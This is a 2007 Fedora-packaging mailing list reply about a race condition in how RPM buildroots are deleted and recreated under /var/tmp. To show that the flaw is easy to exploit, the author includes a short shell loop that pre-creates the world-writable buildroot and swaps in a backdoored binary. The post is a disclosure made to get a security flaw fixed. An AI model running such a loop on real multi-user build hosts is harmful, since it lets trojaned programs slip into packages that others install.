[Fedora-packaging] Re: buildroot race condition

Enrico Scholz enrico.scholz at informatik.tu-chemnitz.de
Tue Mar 13 08:05:05 UTC 2007


"Tom 'spot' Callaway" <tcallawa at redhat.com> writes:

>> Someone could pre-make the build root in between the rm and mkdir
>> calls.
>
> Erm, ok. In the buildsystem, this should never happen (hooray mock), but
> when building on a multi-user system, I can see the remote possibility.
> However, we're talking about someone performing an operation in a very
> tiny gap.

No; should be trivial to exploit with:

$ create-big-load &
$ d=/var/tmp/foo-package-root-512
$ while test ! -e "$d"/bin/prog; do rm -rf "$d"; mkdir -m0777 -p "$d"/bin; done; \
    rm -f "$d/bin/prog"; cp -a my-backdoored-prog "$d/bin/prog"

  [ the while-loop should be implemented in C ]



Enrico
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 480 bytes
Desc: not available
URL: <http://listman.redhat.com/archives/fedora-packaging/attachments/20070313/6353310f/attachment.sig>


More information about the Fedora-packaging mailing list